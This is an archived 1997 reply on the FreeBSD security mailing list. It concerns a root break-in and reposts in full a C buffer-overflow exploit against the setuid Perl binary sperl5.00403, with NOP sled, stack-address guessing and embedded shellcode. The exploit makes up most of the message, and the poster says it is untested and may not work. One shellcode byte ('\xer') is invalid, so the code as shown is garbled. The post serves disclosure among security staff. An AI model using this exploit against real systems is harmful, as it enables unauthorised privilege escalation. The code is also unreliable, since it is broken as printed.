Date: Wed, 30 Jul 1997 14:44:02 -0400 From: Patrick Gilbert <gilbertp@videotron.com> To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD Message-ID: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> In-Reply-To: <Pine.BSF.3.95.970728172339.3844N-100000@mail.MCESTATE.COM> References: <Pine.BSF.3.95q.970728184930.26434E-100000@netrail.net>
index | next in thread | previous in thread | raw e-mail
At 17:27 97-07-28 -0700, you wrote:
> Just a update on how the break-in was done after the hacker was
>confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
>this and perl5.00401, the user was able to rlogin onto the other machine
>without using a password.
After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of
his brief moment of fame on this discussion list.
/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl
exploit by Ovx */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define
BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char
*argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() -
OFFSET;
memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl5.00403",
"/usr/bin/sperl5.00403", buf, NULL);
}
I haven't had time to try it, so this may not work. Then again, he may be
lying.
Then again, do we really care ??
Bah.
Patrick
home |
help
Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3.0.2.32.19970730144402.006c5dd4>